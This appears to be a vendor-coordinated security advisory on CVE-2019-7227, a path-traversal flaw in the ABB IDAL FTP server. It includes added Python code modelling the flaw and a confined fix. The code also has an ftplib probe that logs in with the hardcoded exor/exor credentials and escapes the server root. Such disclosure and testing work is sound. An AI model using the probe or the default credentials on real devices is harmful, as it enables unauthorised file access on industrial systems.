ABB IDAL FTP Server Path Traversal Vulnerability

17 June 2019

IDENTIFIERS

CVE-2019-7227

ABBVU-IAMF-1902006

CVSS SCORE

7.3 (CVSS v3 base vector: AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)

XID

XL-19-008

AFFECTED VENDORS

ABB (new.abb.com)

CREDIT

Eldar Marcussen - xen1thLabs - Software Labs

VULNERABILITY SUMMARY

The IDAL FTP server does not check that a directory change request (CWD) stays inside the FTP server's configured root directory. An authenticated attacker can therefore leave the server root simply by changing directory with "cd ..".

TECHNICAL DETAILS

Once outside the root, an authenticated attacker can change into arbitrary directories on the hard disk and use the server's normal download and upload commands to read and write files there; the ability to write anywhere the server process can reach is what drives the C:H/I:H impact in the CVSS vector. An unauthenticated attacker can become an authenticated one by logging in with the hardcoded or default credential pair exor/exor.

PROOF OF CONCEPT

[Screenshot] FTP session accessing files outside the FTP server root.
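As an added example that is not part of the advisory or of ABB's IDAL code: a Python model of the unchecked CWD resolution the advisory describes, beside a root-confined version that refuses the escape, and an ftplib probe that repeats the "cd .." session shown above against a live server. The root path /srv/ftproot, the host 192.0.2.10 and all function names are assumptions for illustration; exor/exor is the credential pair named in the technical details.

```python
"""
Added example, not part of the xen1thLabs advisory or of ABB's IDAL code:
a minimal model of the root-confinement check the advisory says the IDAL FTP
server lacks, next to the unchecked resolution it describes, plus an ftplib
probe that repeats the advisory's "cd .." test against a live server.
All paths, host names and function names are assumptions for illustration.
"""
import posixpath
from ftplib import FTP, error_perm

# Assumed on-disk root the FTP server is meant to serve (hypothetical path).
FTP_ROOT = "/srv/ftproot"


def resolve_cwd_unchecked(current: str, requested: str) -> str:
    """Model of the defect: join and normalise the requested directory but
    never confirm the result is still beneath the configured root.
    `current` and the result are on-disk paths; "cd .." from the root lands
    in its parent, and an absolute request lands anywhere on the disk."""
    target = requested if requested.startswith("/") else posixpath.join(current, requested)
    return posixpath.normpath(target)


def is_within_root(root: str, path: str) -> bool:
    """True if `path` is `root` itself or lies strictly beneath it.
    The trailing "/" in the prefix test matters: without it "/srv/ftproot2"
    would pass as a child of "/srv/ftproot"."""
    root = posixpath.normpath(root)
    path = posixpath.normpath(path)
    return path == root or path.startswith(root + "/")


def resolve_cwd_jailed(root: str, current: str, requested: str) -> str:
    """Confined version: absolute requests are interpreted relative to the
    root (the client sees a virtual filesystem whose "/" is `root`), relative
    requests against the current directory, and any result that leaves the
    root is refused. On a real filesystem, also pass the candidate through
    os.path.realpath before the prefix test so a symlink cannot point outside."""
    root = posixpath.normpath(root)
    if requested.startswith("/"):
        target = posixpath.join(root, requested.lstrip("/"))
    else:
        target = posixpath.join(current, requested)
    target = posixpath.normpath(target)
    if not is_within_root(root, target):
        raise PermissionError(f"CWD {requested!r} would leave {root}")
    return target


def probe_cwd_traversal(host: str, user: str, password: str,
                        port: int = 21, timeout: float = 10.0) -> dict:
    """Repeats the advisory's manual test over the network: log in, record the
    directory PWD reports, send CWD .., and report whether PWD moved and what
    the new directory lists. Needs a reachable server; not run offline."""
    ftp = FTP()
    ftp.connect(host, port, timeout=timeout)
    try:
        ftp.login(user, password)
        root = ftp.pwd()
        result = {"root": root, "escaped": False, "after": root, "listing": []}
        try:
            ftp.cwd("..")
        except error_perm as exc:          # a confined server refuses the request
            result["reply"] = str(exc)
            return result
        result["after"] = ftp.pwd()        # a confined server that accepts ".." at "/" stays at "/"
        result["escaped"] = result["after"] != root
        try:
            result["listing"] = ftp.nlst()  # names outside the FTP root confirm the escape
        except error_perm:
            pass
        return result
    finally:
        try:
            ftp.quit()
        except Exception:
            ftp.close()


if __name__ == "__main__":
    # Offline demonstration of the two resolvers from the assumed root.
    print("unchecked:", resolve_cwd_unchecked(FTP_ROOT, ".."))
    try:
        resolve_cwd_jailed(FTP_ROOT, FTP_ROOT, "..")
    except PermissionError as exc:
        print("jailed:", exc)
    # Live check against a lab target (hypothetical address): the advisory's
    # credential pair exor/exor is what an unauthenticated attacker tries first.
    # print(probe_cwd_traversal("192.0.2.10", "exor", "exor"))
```

The model uses POSIX path rules; the IDAL runtime ships on Windows, where a server-side check must additionally normalise backslashes and drive-letter prefixes before the prefix comparison, and the string-level test above is only sound once symlinks have been resolved. The probe treats an unchanged PWD after "cd .." as confined; the listing is returned so a manual reviewer can confirm the result when a server reports virtual rather than physical paths.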

 

AFFECTED SYSTEMS

PB610 Panel Builder 600, order code: 1SAP500900R0101, versions 1.91 … 2.8.0.367

 

SOLUTION

Apply the patches and instructions from the vendor:

- ABB PB610:

Until the patch is applied, restricting network access to the FTP service limits exposure (the vector's AV:A rates the attacker as needing adjacent-network access), and the exor/exor credentials should be changed if the product permits it; if they are hardcoded, network restriction is the only interim control.

DISCLOSURE TIMELINE

04/02/2019 - Contacted ABB requesting disclosure coordination

05/02/2019 - Provided vulnerability details

05/06/2019 - Patch available

17/06/2019 - xen1thLabs public disclosure